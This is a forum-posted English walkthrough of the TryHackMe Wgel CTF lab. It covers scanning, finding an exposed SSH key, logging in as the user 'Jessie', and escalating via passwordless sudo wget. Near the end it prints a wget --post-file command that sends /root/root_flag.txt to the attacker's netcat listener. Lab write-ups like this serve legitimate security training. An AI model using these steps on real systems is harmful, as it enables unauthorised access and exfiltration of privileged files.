[EN] TryHackMe Wgel CTF Writeup

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18
Çağrı Ali Ceylan tarafından yazılmıştır.

[EN] TryHackMe Wgel CTF Writeup​


Hello everyone, in this article we will be solving the room named Wgel CTF in TryHackMe.

Let’s Start!

First we perform an aggressive nmap scan, nmap is an information gathering tool that we can collect active information about the network.

nmap -A 10.10.213.167
nmap

nmap

We have 2 open ports, one is port 80 and the other is port 22. There is one website standing on the port 80, and ssh service is standing on port 22. We will go through web as it is open for everyone and then we can use the tool named gobuster to search directories.

gobuster

gobuster

We found one directory, we cannot find much in the sitemap directory, so we are doing a directory scan in the sitemap directory.


And yes! We found a ssh key.

gobuster2

gobuster2

However, we can log in, but we need a username. For this, when we look at the source code of the site, we see a text like this;

<!– Jessie don’t forget to udate the webiste –>
kaynakkod

source code

Based on this text, we understand that the user’s name is “Jessie”, we will now connect to the ssh. Before connecting, we need to define certain permissions for the id_rsa file, we can define it as follows.


Let’s connect to the ssh now.


And yes we are in!

ssh

ssh

When we search the directories inside, we see that the user flag is in the document directory, we can use cat or less tools to read the flag. Anyway, let’s look at the flag.

cd Documents

cat user_flag.txt

less user_flag.txt (alternative)
user_flag.txt

user_flag.txt

Now we need to increase our privilege, so we need to first look at where the administrator privileges are needed, we can use the following command.

sudo-l

sudo-l

When we look at the output of the command, we see that we can be an administrator at/usr/bin/wget without a password, we can exploit it. You can use the detailed resource for abuse here: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/. Now let’s exploit our machine by entering the command given there.



First, we need to listen to our own computer with netcat.




Now let’s enter the following command on the opposite machine, you must enter the ip that tryhackme defined you in the part where the ip address is written.

sudo /usr/bin/wget –post-fi

le=/root/root_flag.txt 10.9.30.197:5050

Flag

Since we are using the wget directory here, the machine did not ask us for a password while getting administrator permission, now has it given us any reaction by going to the terminal tab where we are listening with netcat? Let’s have a look. Yes he did! The value of our administrator flag is in front of us, let’s enter the flag and finish the machine.

root_flag.txt

root_flag.txt

You can follow our website for more content!

https://pwnlab.me/category/walkthrough/
 
Moderatör tarafında düzenlendi:
Geri
Üst